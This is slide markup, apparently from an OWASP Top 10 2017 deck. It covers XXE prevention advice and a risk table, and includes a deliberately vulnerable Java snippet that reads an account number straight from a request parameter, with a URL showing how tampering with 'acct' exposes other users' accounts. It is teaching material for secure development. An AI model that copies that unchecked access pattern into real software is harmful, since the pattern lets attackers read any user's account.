              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Calibri"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId6"/>
            </a:endParaRP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dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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8"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for XML Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1"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9"/>
              </a:rPr>
              <a:t>OWASP XXE Vulnerability</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5"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: XXE Prevention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0"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: XML Security</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endParaRPr lang="en-US" sz="900"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1"/>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2"/>
              </a:rPr>
              <a:t>CWE-611: Improper Restriction of XXE</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Billion Laughs Attack</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4"/>
              </a:rPr>
              <a:t>SAML Security XML External Entity Attack</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Detecting and exploiting XXE in SAML Interfaces</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cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34"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spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Developer training is essential to identify and mitigate XXE. Besides that, p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>reventing XXE requires:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Whenever possible, use less </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>complex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>data formats such as JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>avoiding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>serialization of sensitive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Patch or upgrade all XML processors and libraries in use by the application or on the underlying operating system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Use dependency checkers. Update SOAP to SOAP 1.2 or higher.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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Char char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Disable XML external entity and DTD processing in all XML parsers in the application, as per the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet 'XXE Prevention'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Implement positive ("whitelisting") </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>server-side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>input validation, filtering, or sanitization to prevent hostile data within XML documents, headers, or nodes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Verify that XML or XSL file upload functionality validates incoming XML using XSD validation or similar.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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Char char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>SAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> tools can help detect XXE in source code, although manual code review is the best alternative in large, complex applications with many integrations.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If these controls are not possible, consider using virtual patching, API security gateways, or Web Application Firewalls (WAFs) to detect, monitor, and block XXE attacks. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="143510" indent="-143510">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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A4</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XML External Entities (XXE)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3221113508"/>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5099">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>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7869">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Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="11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endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="11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endParaRPr lang="en-US" sz="1200" b="0" baseline="0"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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="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200" b="0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="OpenSymbol"/>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1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="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200" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>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59432">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Attackers can exploit vulnerable XML processors if they can upload XML or include hostile content in an XML document, exploiting vulnerable code, dependencies or integrations</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:latin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lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>By default, many older XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>SAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> tools can discover this issue by inspecting dependencies and configuration. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId17"/>
                        </a:rPr>
                        <a:t>DAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> tools require additional manual steps to detect and exploit this issue. Manual testers need to be trained in how to test for XXE, as it not commonly tested as of 2017.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>These flaws can be used to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack, as well as execute other attacks.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The business impact depends on the protection needs of all affected</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>application and data.</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263072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The application uses unverified data in a SQL call that is accessing account information:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pP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err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pstmt.setString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, request.getParameter("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>acct"));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> results = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pstmt.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>( );</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An attacker simply modifies the 'acct' parameter in the browser to send whatever account number they want. If not properly verified, the attacker can access any user's account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pP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a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://example.com/app/accountInfo?acct=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
